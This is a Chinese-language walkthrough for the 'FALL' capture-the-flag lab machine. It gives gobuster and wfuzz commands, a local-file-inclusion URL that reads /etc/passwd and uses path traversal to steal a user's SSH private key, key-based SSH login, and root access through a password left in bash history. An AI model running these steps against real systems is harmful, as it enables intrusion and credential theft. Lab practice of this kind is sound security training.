FALL靶机渗透攻略

1.安装并开启靶机

2.获取靶机IP

将靶机和Kali都设置为NAT模式

3.访问靶机地址

4.扫描目录和端口

gobuster dir -u http://192.168.40.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

5.访问敏感文件

提示缺少GET参数

爆破参数

wfuzz -u "http://192.168.40.147/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

尝试读取passwd文件:http://192.168.40.147/test.php?file=/etc/passwd

尝试包含/home/qiu目录下默认保存的ssh密钥文件,通过前面扫描端口知道开了ssh,

我们需要知道ssh默认存私钥的目录:/home/user/.ssh/id_rsa

http://192.168.40.147/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa

将私钥保存到Kali中,用私钥登录

chmod 400 id_rsa

ssh qiu@192.168.40.147 -i id_rsa

6.提权

查看用户qiu家目录下的.bash_history文件,找到密码:remarkablyawesomE

sudo su

相关推荐
用户9623779544814 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机18 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机18 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544819 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star19 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
DianSan_ERP6 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全